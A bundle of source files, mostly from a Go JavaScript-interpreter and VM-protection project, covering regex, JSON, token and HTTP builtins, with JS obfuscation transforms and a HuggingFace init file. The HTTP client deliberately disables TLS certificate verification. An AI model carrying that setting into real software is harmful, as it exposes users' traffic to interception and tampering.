// array of every match in Args[1]. When the pattern has at least one capture
// group the first group is kept, otherwise the whole match. On a bad pattern
// the error is printed and nil is returned.
func Re_findall(myfun *object.FunctionDeclarationObject) object.Object {
	pattern := (*myfun.Args[0]).(*object.StringObject).Value
	haystack := (*myfun.Args[1]).(*object.StringObject).Value
	re, err := regexp.Compile(pattern)
	if err != nil {
		fmt.Println("Error compiling regex:", err)
		return nil
	}

	result := object.NewArray()
	for _, match := range re.FindAllStringSubmatch(haystack, -1) {
		// match[0] is the whole match; match[1] the first capture group.
		picked := match[0]
		if len(match) > 1 {
			picked = match[1]
		}
		var item object.Object = &object.StringObject{Value: picked}
		result.Value = append(result.Value, &item)
	}
	return &result
}
// Re_sub compiles Args[0] as a regular expression and returns Args[1] with
// every match replaced by Args[2] ($-references expand per regexp rules).
// On a bad pattern the error is printed and nil is returned.
func Re_sub(myfun *object.FunctionDeclarationObject) object.Object {
	pattern := (*myfun.Args[0]).(*object.StringObject).Value
	haystack := (*myfun.Args[1]).(*object.StringObject).Value
	replacement := (*myfun.Args[2]).(*object.StringObject).Value
	re, err := regexp.Compile(pattern)
	if err != nil {
		fmt.Println("Error compiling regex:", err)
		return nil
	}
	return &object.StringObject{Value: re.ReplaceAllString(haystack, replacement)}
}
|
2833844911/gojsvmp | 4,470 | parsejson/parsejson.go | package parsejson
import (
"encoding/json"
"fmt"
"myvmp/object"
"myvmp/token"
)
// printJSON recursively converts a decoded encoding/json value tree into
// interpreter objects: JSON objects become map-backed Environments, arrays
// become array Environments, and scalars become String/Numeric/Bool objects.
// A scalar reaching the top-level default branch is printed and nil returned.
// NOTE(review): envobject is threaded through the recursion but never read,
// and the `int` cases are unreachable — encoding/json decodes all JSON
// numbers as float64 — presumably defensive leftovers; confirm before removal.
func printJSON(data interface{}, envobject *object.Environment) *object.Environment {
	switch v := data.(type) {
	case map[string]interface{}:
		dataeenv := newObject()
		for key, value := range v {
			switch value.(type) {
			case string:
				dataeenv.Store.Set(key, &object.StringObject{
					Value: value.(string),
				})
			case int:
				dataeenv.Store.Set(key, &object.NumericObject{
					Value: float64(value.(int)),
				})
			case float64:
				dataeenv.Store.Set(key, &object.NumericObject{
					Value: value.(float64),
				})
			case bool:
				dataeenv.Store.Set(key, &object.BoolObject{
					Value: value.(bool),
				})
			default:
				// Nested object/array (or null): recurse.
				dataeenv.Store.Set(key, printJSON(value, envobject))
			}
		}
		return dataeenv
	case []interface{}:
		dataeenv := newArray()
		for _, value := range v {
			switch value.(type) {
			case string:
				var dasda object.Object = &object.StringObject{
					Value: value.(string),
				}
				dataeenv.Value = append(dataeenv.Value, &dasda)
			case int:
				var dasda object.Object = &object.NumericObject{
					Value: float64(value.(int)),
				}
				dataeenv.Value = append(dataeenv.Value, &dasda)
			case float64:
				var dasda object.Object = &object.NumericObject{
					Value: value.(float64),
				}
				dataeenv.Value = append(dataeenv.Value, &dasda)
			case bool:
				var dasda object.Object = &object.BoolObject{
					Value: value.(bool),
				}
				dataeenv.Value = append(dataeenv.Value, &dasda)
			default:
				// Nested object/array (or null): recurse.
				var dasda object.Object = printJSON(value, envobject)
				dataeenv.Value = append(dataeenv.Value, &dasda)
			}
		}
		return dataeenv
	default:
		// Bare scalar at this level: printed and dropped (nil result).
		fmt.Printf("%v\n", v)
	}
	return nil
}
// newObject allocates an empty interpreter object (map-backed Environment).
func newObject() *object.Environment {
	dataeenv := object.NewObject()
	return &dataeenv
}

// newArray allocates an empty interpreter array Environment.
func newArray() *object.Environment {
	dataeenv := object.NewArray()
	return &dataeenv
}
// ParseStrToJson implements JSON.parse: jsonStr is first tried as an object,
// then as an array; the decoded tree is converted to interpreter objects via
// printJSON. If neither decode succeeds the array-decode error is printed
// and nil is returned.
func ParseStrToJson(jsonStr string) object.Object {
	var asMap map[string]interface{}
	if err := json.Unmarshal([]byte(jsonStr), &asMap); err == nil {
		return printJSON(asMap, nil)
	}
	var asList []interface{}
	if err := json.Unmarshal([]byte(jsonStr), &asList); err != nil {
		fmt.Println("Error parsing JSON:", err)
		return nil
	}
	return printJSON(asList, nil)
}
// stringifyTostr2 lowers an interpreter array's elements to plain Go values
// suitable for json.Marshal. Elements of unhandled types are encoded as the
// placeholder string "[<type>]" (note: the map variant below omits them).
func stringifyTostr2(objec3 []*object.Object) []interface{} {
	dt := []interface{}{}
	for _, valuee := range objec3 {
		value := (*valuee)
		switch value.Type() {
		case token.TYNUM:
			dsd := value.(*object.NumericObject).Value
			dt = append(dt, dsd)
		case token.TYSTR:
			dsd := value.(*object.StringObject).Value
			dt = append(dt, dsd)
		case token.Object:
			dsd := value.(*object.Environment).Store.M
			dt = append(dt, stringifyTostr(dsd))
		case token.BOOL:
			dsd := value.(*object.BoolObject).Value
			dt = append(dt, dsd)
		case token.ArrayE:
			dsd := value.(*object.Environment).Value
			dt = append(dt, stringifyTostr2(dsd))
		default:
			// YOUZ/ZUOZ are "[" and "]": unknown types serialise as "[type]".
			dt = append(dt, token.YOUZ+value.Type()+token.ZUOZ)
		}
	}
	return dt
}

// stringifyTostr lowers an interpreter object's fields to a plain Go map for
// json.Marshal; fields of unhandled types are silently omitted.
func stringifyTostr(objec3 map[string]object.Object) map[string]interface{} {
	dt := map[string]interface{}{}
	for key, value := range objec3 {
		switch value.Type() {
		case token.TYNUM:
			dsd := value.(*object.NumericObject).Value
			dt[key] = dsd
		case token.TYSTR:
			dsd := value.(*object.StringObject).Value
			dt[key] = dsd
		case token.Object:
			dsd := value.(*object.Environment).Store.M
			dt[key] = stringifyTostr(dsd)
		case token.BOOL:
			dsd := value.(*object.BoolObject).Value
			dt[key] = dsd
		case token.ArrayE:
			dsd := value.(*object.Environment).Value
			dt[key] = stringifyTostr2(dsd)
		default:
			// Unknown field types are dropped from the serialised object.
			continue
		}
	}
	return dt
}
// JsonToStr implements JSON.stringify for interpreter values: arrays and
// objects are lowered via stringifyTostr2 / stringifyTostr and marshalled.
// Marshal failures silently fall back to "[]" / "{}", and any receiver type
// other than array/object yields the placeholder string "[this]".
func JsonToStr(objec3 *object.Environment) object.Object {
	switch objec3.Type() {
	case token.ArrayE:
		dsd := objec3.Value
		dgg := stringifyTostr2(dsd)
		jsonString, err := json.Marshal(dgg)
		if err != nil {
			//fmt.Println("Error marshaling to JSON:", err)
			return &object.StringObject{Value: "[]"}
		}
		return &object.StringObject{Value: string(jsonString)}
	case token.Object:
		dsad := objec3.Store.M
		dgg := stringifyTostr(dsad)
		jsonString, err := json.Marshal(dgg)
		if err != nil {
			//fmt.Println("Error marshaling to JSON:", err)
			return &object.StringObject{Value: "{}"}
		}
		return &object.StringObject{Value: string(jsonString)}
	}
	// YOUZ/ZUOZ are "[" and "]", THIS is "this": result is "[this]".
	return &object.StringObject{Value: token.YOUZ + token.THIS + token.ZUOZ}
}
|
2833844911/gojsvmp | 4,212 | token/token.go | package token
// TokenType is a single lexical token produced by the scanner.
type TokenType struct {
	TypeInfo string // token category (e.g. "number", "string", IDENT)
	Value    string // literal source text of the token
	PAXU     int    // binding power / precedence used by the parser
}
// Runtime value type tags used by the object system (typeof results).
const (
	TYNUM    = "number"
	TYSTR    = "string"
	BULLE    = "null"
	NANINFO  = "NaN"
	BOOL     = "boolean"
	FUNCTION = "function"
	TRUE     = "true"
	FALSE    = "false"
)

// Source-level lexemes: keywords, operators and punctuation recognised by
// the lexer/parser.
const (
	NNNN       = ""
	ELSE       = "else"
	TYPEOF     = "typeof"
	FUN        = "function"
	FOR        = "for"
	DENYU      = "="
	QUFAN      = "!"
	BUDY       = "!="
	BUDYDY     = "!=="
	Str        = "\""
	Str2       = "'"
	XIAND      = "=="
	MAOHAO     = ":"
	QUYU       = "%"
	HUO        = "|"
	HUOHUO     = "||"
	YU         = "&"
	YUYU       = "&&"
	XIAOYH     = "<"
	XIAOYHYH   = "<<"
	JIADEN     = "+="
	JANDEN     = "-="
	XIAOYHYHYH = "<<<"
	XIAOYHDY   = "<="
	DAYH       = ">"
	DAYHDY     = ">="
	DAYHYH     = ">>"
	DAYHYHYU   = ">>>"
	DXIAND     = "==="
	IF         = "if"
	ZHUOK      = "("
	YOUOK      = ")"
	YOUZ       = "["
	ZUOZ       = "]"
	ADD        = "+"
	YIHUO      = "^"
	DH         = ","
	SDD        = "-"
	CHU        = "/"
	ZUOKH      = "}"
	DUOZF      = "`"
	YOUKH      = "{"
	CHEN       = "*"
	KAIFAN     = "**"
	UPADD      = "++"
	UPASD      = "--"
	DONT       = "DONT"
	END        = ""
	Kong       = ""
	Dian       = "."
)

// Small integer constants. NOTE(review): ONE is -1 despite its name —
// presumably a sentinel value; confirm against usage before renaming.
const (
	ZNO   = 0
	ONE   = -1
	TWO   = 2
	SCRRR = 3
	FOTT  = 4
	FIVE  = 5
	SIX   = 6
)

// Built-in member names available on array/string values.
const (
	Slice  = "slice"
	Length = "length"
)
// Names of free-standing built-in functions exposed to scripts.
const (
	GetLength   = "len"
	ParseInt    = "parseInt"
	Wait        = "wait"
	ParseFloat  = "parseFloat"
	Print       = "cyout"
	GetChar     = "cychar"
	CharToStr   = "cystr"
	Input       = "input"
	AppendArray = "cyappend"
	Delete      = "delete"
)

// Math global object and its members.
const (
	Math        = "Math"
	Math_random = "random"
	Math_Pow    = "pow"
	Math_Sqrt   = "sqrt"
)

// Object global object and its members.
const (
	Objecte                = "Object"
	Objecte_setPrototypeOf = "setPrototypeOf"
	Objecte_keys           = "keys"
)

// Promise global object and its members (cbb_* are internal callback slots).
const (
	Promise      = "Promise"
	Promise_then = "then"
	Cbb_a        = "cbb_a"
	Cbb_b        = "cbb_b"
)

// JSON global object and its members.
const (
	JSON           = "JSON"
	JSON_stringify = "stringify"
	JSON_parse     = "parse"
)

// Date global object and its members.
const (
	Date       = "Date"
	Date_now   = "now"
	Date_sleep = "sleep"
)

// console global object and its members.
const (
	CONSOLE     = "console"
	CONSOLE_log = "log"
)

// String global object and its members.
const (
	String              = "String"
	String_fromCharCode = "fromCharCode"
	String_strip        = "strip"
	String_replace      = "replace"
	String_split        = "split"
	String_decode       = "decode"
	String_encode       = "encode"
	String_newbyte      = "newbyte"
)

// etree global object (HTML parsing) and its members.
const (
	Etree         = "etree"
	Etree_HTML    = "HTML"
	Etree_xpath   = "xpath"
	Etree_gethtml = "gethtml"
)

// fs global object (filesystem / process) and its members.
const (
	Fs          = "fs"
	File        = "file"
	Fs_open     = "open"
	Fs_read     = "read"
	Fs_readCont = "readcont"
	Fs_close    = "close"
	Fs_write    = "write"
	Fs_cmd      = "cmd"
	Fs_ms       = "ms"
	Fs_encoding = "encoding"
)

// re global object (regular expressions) and its members.
const (
	Re         = "re"
	Re_findall = "findall"
	Re_sub     = "sub"
)

// Array method names.
const (
	PUSH = "push"
	POP  = "pop"
	JION = "join"
)
// cyhttp global object: method names, request-config keys and the keys of
// the response object built by banding.Cyhttp_get / banding.Cyhttp_post.
// Jsontext, Headerstext and Headerstext2 are internal cache/storage keys on
// the response: Headerstext2 holds the raw response-header JSON string,
// while Jsontext / Headerstext cache the lazily parsed body / headers.
const (
	Cyhttp           = "cyhttp"
	Cyhttp_get       = "get"
	Cyhttp_post      = "post"
	Cyhttp_ReHeaders = "headers"
	Headers          = "headers"
	Timeout          = "timeout"
	Params           = "params"
	Allow_redirects  = "allow_redirects"
	Proxies          = "proxies"
	Content          = "content"
	Status           = "status"
	Iserror          = "iserror"
	Text             = "text"
	Data             = "data"
	Json             = "json"
	Jsontext         = "jsontext"
	// Bug fix: this was "jsontext", identical to Jsontext, so the parsed-body
	// cache and the parsed-headers cache collided — calling resp.json() first
	// made resp.headers() return the body. Give the headers cache its own key.
	Headerstext  = "headerstext"
	Headerstext2 = "jsontext2" // raw headers JSON as stored by Cyhttp_get/post
)
// AST node kinds, statement keywords and miscellaneous parser markers.
const (
	Prog     = "Prog"
	IDENT    = "IDENT"
	NULL     = "null"
	BYTE     = "byte"
	INT      = "INT"
	VAR      = "var"
	CALL     = "call"
	APPLY    = "apply"
	Bin      = "Bin"
	OVER     = ";"
	HUANH    = "\n"
	TB       = "\t"
	TR       = "\r"
	Ass      = "Ass"
	Call     = "Call"
	NOP      = " "
	IfStat   = "IfStat"
	Block    = "Block"
	Arguments = "arguments"
	Unary    = "Unary"
	FuncD    = "FuncD"
	FuncE    = "FuncE"
	Member   = "Member"
	Stri     = "Stri"
	THIS     = "this"
	ENV      = "env"
	IN       = "in"
	CONTINUE = "continue"
	ForS     = "ForS"
	ForI     = "ForI"
	ArrayE   = "ArrayE"
	Object   = "Object"
	Prop     = "Prop"
	BREAK    = "break"
	TRY      = "try"
	CATCH    = "catch"
	RETURN   = "return"
	Debug    = "debugger"
	NEW      = "new"
	Eval     = "eval"
	Require  = "require"
)
|
2833844911/gojsvmp | 4,249 | http/http.go | package http
import (
"bytes"
"crypto/tls"
"encoding/json"
"io/ioutil"
"net/http"
"net/url"
"time"
)
// GetHttp performs an HTTP GET request and returns a *Response that is never
// nil. Params (if any) are appended to the URL as a query string, headers are
// applied verbatim, timeOut is in seconds, allowRedirects toggles redirect
// following and proxyURL (may be empty) selects an explicit proxy.
// TLS certificate verification is deliberately disabled.
// On any failure the returned Response carries ErrMessage; IsError is cleared
// only after the body has been read successfully.
func GetHttp(urlInfo string, headers map[string]string, timeOut int64, Params map[string]string, allowRedirects bool, proxyURL string) *Response {
	myresponse := New_response()
	if Params != nil {
		data := url.Values{}
		for key, vlue := range Params {
			data.Set(key, vlue)
		}
		urlInfo = urlInfo + "?" + data.Encode()
	}
	// Choose the proxy: an explicit URL if given, otherwise the environment.
	var proxyFunc func(*http.Request) (*url.URL, error)
	if proxyURL != "" {
		proxyURLParsed, err := url.Parse(proxyURL)
		if err != nil {
			// Bug fix: previously returned nil here, which made callers that
			// dereference the response panic; surface the error instead.
			myresponse.ErrMessage = err.Error()
			return myresponse
		}
		proxyFunc = http.ProxyURL(proxyURLParsed)
	} else {
		proxyFunc = http.ProxyFromEnvironment
	}
	tlsConfig := &tls.Config{}
	tlsConfig.InsecureSkipVerify = true // accept self-signed/mismatched certs
	req, err := http.NewRequest("GET", urlInfo, nil)
	if err != nil {
		myresponse.ErrMessage = err.Error()
		return myresponse
	}
	for key, value := range headers {
		req.Header.Set(key, value)
	}
	timeOut2 := time.Duration(timeOut) * time.Second
	client := &http.Client{
		Timeout: timeOut2,
		Transport: &http.Transport{
			Proxy:           proxyFunc,
			TLSClientConfig: tlsConfig,
		},
		// When redirects are disabled, return the first response unchanged.
		CheckRedirect: func(req *http.Request, via []*http.Request) error {
			if !allowRedirects && len(via) >= 1 {
				return http.ErrUseLastResponse
			}
			return nil
		},
	}
	resp, err := client.Do(req)
	if err != nil {
		myresponse.ErrMessage = err.Error()
		return myresponse
	}
	defer resp.Body.Close()
	body, err := ioutil.ReadAll(resp.Body)
	if err != nil {
		myresponse.ErrMessage = err.Error()
		return myresponse
	}
	// Response headers are exposed to scripts as a JSON string.
	jsonString, _ := json.Marshal(resp.Header)
	myresponse.ReHeaders = string(jsonString)
	myresponse.IsError = false
	myresponse.Text = string(body)
	myresponse.Status = resp.Status
	myresponse.Content = body
	return myresponse
}
// PostHttp performs an HTTP POST request with the given raw body `data` and
// returns a *Response that is never nil. Params (if any) are appended to the
// URL as a query string, headers are applied verbatim, timeOut is in seconds,
// allowRedirects toggles redirect following and proxyURL (may be empty)
// selects an explicit proxy. TLS certificate verification is disabled.
// On any failure the returned Response carries ErrMessage; IsError is cleared
// only after the body has been read successfully.
func PostHttp(urlInfo string, headers map[string]string, timeOut int64, Params map[string]string, allowRedirects bool, proxyURL string, data string) *Response {
	myresponse := New_response()
	if Params != nil {
		// Renamed from "data" to avoid shadowing the request-body parameter.
		qs := url.Values{}
		for key, vlue := range Params {
			qs.Set(key, vlue)
		}
		urlInfo = urlInfo + "?" + qs.Encode()
	}
	// Choose the proxy: an explicit URL if given, otherwise the environment.
	var proxyFunc func(*http.Request) (*url.URL, error)
	if proxyURL != "" {
		proxyURLParsed, err := url.Parse(proxyURL)
		if err != nil {
			// Bug fix: previously returned nil here, which made callers that
			// dereference the response panic; surface the error instead.
			myresponse.ErrMessage = err.Error()
			return myresponse
		}
		proxyFunc = http.ProxyURL(proxyURLParsed)
	} else {
		proxyFunc = http.ProxyFromEnvironment
	}
	tlsConfig := &tls.Config{}
	tlsConfig.InsecureSkipVerify = true // accept self-signed/mismatched certs
	req, err := http.NewRequest("POST", urlInfo, bytes.NewBuffer([]byte(data)))
	if err != nil {
		myresponse.ErrMessage = err.Error()
		return myresponse
	}
	for key, value := range headers {
		req.Header.Set(key, value)
	}
	timeOut2 := time.Duration(timeOut) * time.Second
	client := &http.Client{
		Timeout: timeOut2,
		Transport: &http.Transport{
			Proxy:           proxyFunc,
			TLSClientConfig: tlsConfig,
		},
		// When redirects are disabled, return the first response unchanged.
		CheckRedirect: func(req *http.Request, via []*http.Request) error {
			if !allowRedirects && len(via) >= 1 {
				return http.ErrUseLastResponse
			}
			return nil
		},
	}
	resp, err := client.Do(req)
	if err != nil {
		myresponse.ErrMessage = err.Error()
		return myresponse
	}
	defer resp.Body.Close()
	body, err := ioutil.ReadAll(resp.Body)
	if err != nil {
		myresponse.ErrMessage = err.Error()
		return myresponse
	}
	// Response headers are exposed to scripts as a JSON string.
	jsonString, _ := json.Marshal(resp.Header)
	myresponse.ReHeaders = string(jsonString)
	myresponse.IsError = false
	myresponse.Text = string(body)
	myresponse.Status = resp.Status
	myresponse.Content = body
	return myresponse
}
|
2833844911/cy_jsvmp | 1,350 | tool/cshshuzduei.js | function cshduei(){
this.pop = function (){
var t
if (!this.gx[this.s][0]){
this.gx[this.s][0] = "yhhw"+this.num
this.gx["yhhw"+this.num] = [undefined, this.s,undefined]
this.num += 1
}
return t = this.gx[this.s][2], this.s = this.gx[this.s][0], this.length -= 1, t;
}
this.push = function (a){
var hu = this.gx[this.s][1];
if (!hu){
this.gx["yhh"+this.num] = [this.s, undefined,undefined], hu = "yhh"+this.num,
this.num += 1
}
return this.s = hu, this.gx[this.s][2] = a,this.length += 1, a;
}
this.sf = function (){
var e
if (this.length < 1){return 10}
return e = this.gx[this.s][2], this.s = this.gx[this.s][0], this.length--, this.s = this.gx[this.s][1], this.gx[this.s][2] = e,this.length+=1, 101;
}
this.shift = function (){
var sc, h, g = this.s;
this.length -= 1;
this.s = this.gx[this.s][0]
h = this.gx[g][2];
while (!![]){
if (g === this.gx["cbb1"][1]){
break
}
sc = this.gx[this.gx[g][0]][2], this.gx[this.gx[g][0]][2] = h, h = sc,g = this.gx[g][0];
}
return h;
}
this.gx = CbbTHALLYhh
this.s = "cbb1"
this.length = 0
this.num = 0
}
|
27182812/ChatGLM-LLaMA-chinese-insturct | 2,124 | src/transformers/models/decision_transformer/__init__.py | # Copyright 2020 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import TYPE_CHECKING
from ...utils import OptionalDependencyNotAvailable, _LazyModule, is_torch_available
# Map of submodule name -> public symbols, consumed by _LazyModule below.
# The configuration module has no optional dependencies, so it is always listed.
_import_structure = {
    "configuration_decision_transformer": [
        "DECISION_TRANSFORMER_PRETRAINED_CONFIG_ARCHIVE_MAP",
        "DecisionTransformerConfig",
    ],
}

# The modeling module requires torch; register its symbols only when torch
# is installed, otherwise silently leave them out of the lazy structure.
try:
    if not is_torch_available():
        raise OptionalDependencyNotAvailable()
except OptionalDependencyNotAvailable:
    pass
else:
    _import_structure["modeling_decision_transformer"] = [
        "DECISION_TRANSFORMER_PRETRAINED_MODEL_ARCHIVE_LIST",
        "DecisionTransformerGPT2Model",
        "DecisionTransformerGPT2PreTrainedModel",
        "DecisionTransformerModel",
        "DecisionTransformerPreTrainedModel",
    ]

if TYPE_CHECKING:
    # Static type checkers see the real imports so symbols resolve.
    from .configuration_decision_transformer import (
        DECISION_TRANSFORMER_PRETRAINED_CONFIG_ARCHIVE_MAP,
        DecisionTransformerConfig,
    )

    try:
        if not is_torch_available():
            raise OptionalDependencyNotAvailable()
    except OptionalDependencyNotAvailable:
        pass
    else:
        from .modeling_decision_transformer import (
            DECISION_TRANSFORMER_PRETRAINED_MODEL_ARCHIVE_LIST,
            DecisionTransformerGPT2Model,
            DecisionTransformerGPT2PreTrainedModel,
            DecisionTransformerModel,
            DecisionTransformerPreTrainedModel,
        )

else:
    # At runtime, replace this module with a lazy proxy that imports each
    # submodule on first attribute access.
    import sys

    sys.modules[__name__] = _LazyModule(__name__, globals()["__file__"], _import_structure, module_spec=__spec__)
|
2833844911/cy_jsvmp | 3,512 | tool/switchtoif.js | const parser = require('@babel/parser');
const traverse = require('@babel/traverse').default;
const generator = require("@babel/generator").default;
const tee = require("@babel/types");
const { log } = require('console');
// switchtoif: deobfuscation pass that rewrites every switch statement over
// numeric case labels into an equivalent binary-search tree of if/else
// statements (comparing the discriminant with "<"). A default case, when
// present, becomes the top-level "indexOf(...) == -1" branch.
// Input is JS source text; output is the transformed source text.
function switchtoif(data){
    let parsetoSy = {
        SwitchStatement(path){
            // diedaidata: recursively split the (ascending) [label, body]
            // pairs in half and emit a "<" comparison at each split point.
            // Trailing BreakStatements are stripped from leaf bodies.
            function diedaidata( shuenxun){
                if (shuenxun.length == 2){
                    var s = shuenxun[0][1].pop()
                    if (s.type !== "BreakStatement"){
                        shuenxun[0][1].push(s)
                    }
                    s = shuenxun[1][1].pop()
                    if (s.type !== "BreakStatement"){
                        shuenxun[1][1].push(s)
                    }
                    var jiego = tee.ifStatement(tee.binaryExpression("<", tee.identifier(tiaojian), tee.numericLiteral(shuenxun[0][0] +1)),
                        tee.blockStatement(shuenxun[0][1]), tee.blockStatement(shuenxun[1][1]))
                    ;
                    return jiego;
                }else if (shuenxun.length == 1){
                    var s = shuenxun[0][1].pop()
                    if (s.type !== "BreakStatement"){
                        shuenxun[0][1].push(s)
                    }
                    return tee.blockStatement(shuenxun[0][1])
                }
                var zj = Math.ceil(shuenxun.length/2)
                var jiego = tee.ifStatement(tee.binaryExpression("<", tee.identifier(tiaojian), tee.numericLiteral(shuenxun[zj][0])),
                    diedaidata(shuenxun.slice(0, zj)), diedaidata(shuenxun.slice(zj))
                );
                return jiego
            }
            var tiaojian = path.node.discriminant.name;  // switch variable name
            var shuenxun = [];  // [label, consequent] pairs, ascending by label
            var shunull = null  // body of the default case, if any
            var cz = [];        // labels already consumed (selection-sort bookkeeping)
            // Repeatedly pick the largest not-yet-consumed label and prepend
            // it, yielding shuenxun sorted in ascending label order.
            while (1){
                let max = -1;
                let value = null
                for (let i = 0; i < path.node.cases.length; i++){
                    if (path.node.cases[i].test == null){
                        if (cz.indexOf(null) == -1 && shunull == null){
                            cz.push(null)
                            shunull =path.node.cases[i].consequent
                        }
                        continue
                    }
                    if ( path.node.cases[i].test.value > max && cz.indexOf(path.node.cases[i].test.value ) == -1){
                        max = path.node.cases[i].test.value
                        value = path.node.cases[i].consequent;
                    }
                }
                shuenxun.splice(0,0,[max,value])
                cz.push(max)
                if (cz.length >= path.node.cases.length){
                    break
                }
            }
            log(cz)
            var rety;
            if (shunull == null){
                rety = diedaidata(shuenxun, tiaojian)
            }else{
                // Strip a trailing break from the default body, then guard the
                // whole tree: run the default when the value is not a known label.
                var s = shunull.pop()
                if (s.type !== "BreakStatement"){
                    shunull.push(s)
                }
                rety =
                    tee.ifStatement(parser.parse(`${JSON.stringify(cz)}.indexOf(${tiaojian}) == -1`).program.body[0].expression,
                        tee.blockStatement(shunull), diedaidata(shuenxun, tiaojian)
                    );
            }
            path.replaceInline(rety)
            path.skip()  // do not re-traverse the freshly generated tree
        }
    }
    let ast = parser.parse(data)
    traverse(ast, parsetoSy)
    return generator(ast).code
}
exports.switchtoif = switchtoif;
|
2833844911/cy_jsvmp | 2,457 | tool/tosanyuan.js | const parser = require('@babel/parser');
const traverse = require('@babel/traverse').default;
const generator = require("@babel/generator").default;
const tee = require("@babel/types");
const { log } = require('console');
const fs = require("fs")
// tosanyuan: transforms every if/else statement that has both branches into
// a ternary conditional of comma (sequence) expressions:
//   if (t){a; b}else{c}  ->  t ? (a, b) : (c)
// Statements that are not plain expressions make babel's builder throw, in
// which case the node is left unchanged (the empty catch). The result is
// re-generated minified, with the "Cbb([],[]);" bootstrap stub removed.
function tosanyuan(data){
    var ast = parser.parse(data)
    let parseDate = {
        IfStatement(path){
            var shuj = []  // expressions collected from the else branch
            if ( path.node.alternate == undefined || path.node.consequent == undefined){
                return
            }
            // The alternate may be a single statement or a block; collect the
            // underlying expression node(s) either way.
            if (path.node.alternate.body == undefined){
                if (path.node.alternate.type === "ExpressionStatement"){
                    shuj.push(path.node.alternate.expression)
                }else {
                    shuj.push(path.node.alternate)
                }
            }else {
                for (let i = 0; i< path.node.alternate.body.length; i++){
                    if (path.node.alternate.body[i].type === "ExpressionStatement"){
                        shuj.push(path.node.alternate.body[i].expression)
                    }else {
                        shuj.push(path.node.alternate.body[i])
                    }
                }
            }
            var shuj2 = []  // expressions collected from the then branch
            if (path.node.consequent.body == undefined){
                if (path.node.consequent.type === "ExpressionStatement"){
                    shuj2.push(path.node.consequent.expression)
                }else {
                    shuj2.push(path.node.consequent)
                }
            }else{
                for (let i = 0; i< path.node.consequent.body.length; i++){
                    if (path.node.consequent.body[i].type === "ExpressionStatement"){
                        shuj2.push(path.node.consequent.body[i].expression)
                    }else {
                        shuj2.push(path.node.consequent.body[i])
                    }
                }
            }
            var hu,ko,kop, kop2;
            try{
                hu = tee.conditionalExpression(path.node.test, tee.sequenceExpression(shuj2), tee.sequenceExpression(shuj))
                path.replaceInline(hu)
            }catch (e){
                // Non-expression statements (if/for/return...) cannot become a
                // sequence expression; keep the original if/else in that case.
            }
        }
    }
    traverse(ast, parseDate)
    return generator(ast, {
        minified: true,
        comments: false,
        jsescOption: {
            minimal: true
        }
    }).code.replace('Cbb([],[]);','')
}
exports.tosanyuan = tosanyuan;
|
2833844911/gojsvmp | 20,783 | banding/banding.go | package banding
import (
"bufio"
"bytes"
"fmt"
"golang.org/x/text/encoding/simplifiedchinese"
"golang.org/x/text/transform"
"io/ioutil"
"math"
"math/rand"
"myvmp/etree"
"myvmp/fs"
"myvmp/http"
"myvmp/object"
"myvmp/parsejson"
"myvmp/re"
"myvmp/token"
"os"
"strconv"
"strings"
"time"
"unicode/utf8"
)
// ParseInt implements the parseInt builtin: a string argument is parsed as a
// base-10 integer (0 on failure) and a numeric argument is truncated toward
// zero. Any other argument type yields 0.
func ParseInt(myfun *object.FunctionDeclarationObject) object.Object {
	args := myfun.Args
	switch (*args[0]).Type() {
	case token.TYSTR:
		raw := (*args[0]).(*object.StringObject).Value
		n, err := strconv.Atoi(raw)
		if err != nil {
			// Unparseable text degrades to 0 rather than raising an error.
			return &object.NumericObject{Value: 0}
		}
		return &object.NumericObject{Value: float64(n)}
	case token.TYNUM:
		num := (*args[0]).(*object.NumericObject).Value
		return &object.NumericObject{Value: float64(int(num))}
	}
	return &object.NumericObject{Value: float64(0)}
}
// ParseFloat implements the parseFloat builtin: a string argument is parsed
// as a float64 (0 on failure) and a numeric argument is returned unchanged.
// Any other argument type yields 0.
func ParseFloat(myfun *object.FunctionDeclarationObject) object.Object {
	args := myfun.Args
	switch (*args[0]).Type() {
	case token.TYSTR:
		raw := (*args[0]).(*object.StringObject).Value
		f, err := strconv.ParseFloat(raw, 64)
		if err != nil {
			// Unparseable text degrades to 0 rather than raising an error.
			return &object.NumericObject{Value: 0}
		}
		return &object.NumericObject{Value: f}
	case token.TYNUM:
		return &object.NumericObject{Value: (*args[0]).(*object.NumericObject).Value}
	}
	return &object.NumericObject{Value: float64(0)}
}
// CharToStr implements the cystr builtin: it converts a numeric Unicode code
// point into the one-character string it denotes — the inverse of
// GetChar/cychar, which returns a rune's code point as a number.
func CharToStr(myfun *object.FunctionDeclarationObject) object.Object {
	dt := myfun.Args
	code := int((*dt[0]).(*object.NumericObject).Value)
	// Bug fix: strconv.Itoa produced the decimal digits of the code point
	// (65 -> "65") instead of the character itself (65 -> "A").
	return &object.StringObject{Value: string(rune(code))}
}
// AppendArray implements the cyappend builtin: it appends the second argument
// to the array environment given as the first argument, mutating it in place,
// and returns the appended value.
func AppendArray(myfun *object.FunctionDeclarationObject) object.Object {
	dt := myfun.Args
	(*dt[0]).(*object.Environment).Value = append((*dt[0]).(*object.Environment).Value, dt[1])
	return *dt[1]
}
//
//func GetToken(dt []*object.Object) object.Object {
// // 获取 window 对象
//
// // 获取 window 对象
// window := js.Global()
// cdzfc := (*dt[0]).(*object.StringObject).Value
// // 读取 window.mytoken 的值
// window.Call("cycallback", cdzfc)
//
// dte := &object.StringObject{Value: cdzfc}
// return dte
//}
// Delete implements the delete builtin: on an object environment it removes
// the entry named by the second (string) argument; on an array environment it
// removes the element at the second (numeric) index. The removed value is
// returned. NOTE(review): out stays nil for any other environment type —
// presumably callers never pass one; confirm before relying on it.
func Delete(myfun *object.FunctionDeclarationObject) object.Object {
	dt := myfun.Args
	ko := (*dt[0]).(*object.Environment)
	typej := ko.Type()
	var out object.Object
	switch typej {
	case token.Object:
		key := (*dt[1]).(*object.StringObject)
		// Capture the old value before removing the key.
		out, _ = ko.Store.Get(key.Value)
		ko.Store.Delete(key.Value)
		//delete(ko.Store, key.Value)
	case token.ArrayE:
		key := int((*dt[1]).(*object.NumericObject).Value)
		out = *ko.Value[key]
		// Splice the element out by rejoining the two halves.
		jhhi := ko.Value[0:key]
		jhhi2 := ko.Value[key+1 : len(ko.Value)]
